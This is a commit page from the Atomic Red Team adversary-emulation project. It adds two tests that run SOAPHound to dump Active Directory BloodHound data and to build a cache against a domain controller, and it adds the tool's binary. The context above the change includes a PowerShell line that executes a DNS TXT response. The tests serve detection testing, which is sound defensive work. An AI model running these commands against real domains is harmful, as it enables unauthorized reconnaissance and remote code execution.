SOAPHound (#2689)

* SOAPHound * Updates --------- Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
redcanaryco · Feb 22, 2024 · 8f71cf4 · 8f71cf4
1 parent a840cf6
commit 8f71cf4
Show file tree

Hide file tree

Showing 2 changed files with 75 additions and 0 deletions.
diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml
@@ -405,3 +405,78 @@ atomic_tests:
       function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
       powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
     name: powershell
+- name: SOAPHound - Dump BloodHound Data
+  description: |
+    Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory.
+    src: https://github.com/FalconForceTeam/SOAPHound
+  supported_platforms:
+  - windows
+  input_arguments:
+    user:
+      description: Username for authentication
+      type: string
+      default: $env:USERNAME
+    password:
+      description: Password for authentication
+      type: string
+      default: P@ssword1
+    domain:
+      description: Domain for authentication
+      type: string
+      default: $env:USERDOMAIN
+    dc:
+      description: Domain Controller IP
+      type: string
+      default: 10.0.1.14
+    cachefilename:
+      description: Cache filename
+      type: string
+      default: c:\temp\cache.txt
+    outputdirectory:
+      description: Output directory
+      type: string
+      default: c:\temp\test2
+    soaphound_path:
+      description: Path to SOAPHound binary
+      type: string
+      default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
+  executor:
+    command: |
+      #{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
+    name: powershell
+- name: SOAPHound - Build Cache
+  description: |
+    Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename.
+    src: https://github.com/FalconForceTeam/SOAPHound
+  supported_platforms:
+  - windows
+  input_arguments:
+    user:
+      description: Username for authentication
+      type: string
+      default: $env:USERNAME
+    password:
+      description: Password for authentication
+      type: string
+      default: P@ssword1
+    domain:
+      description: Domain for authentication
+      type: string
+      default: $env:USERDOMAIN
+    dc:
+      description: Domain Controller IP
+      type: string
+      default: 10.0.1.14
+    cachefilename:
+      description: Cache filename
+      type: string
+      default: c:\temp\cache.txt
+    soaphound_path:
+      description: Path to SOAPHound binary
+      type: string
+      default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
+  executor:
+    command: |
+      #{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
+    name: powershell
+
diff --git a/atomics/T1059.001/bin/SOAPHound.exe b/atomics/T1059.001/bin/SOAPHound.exe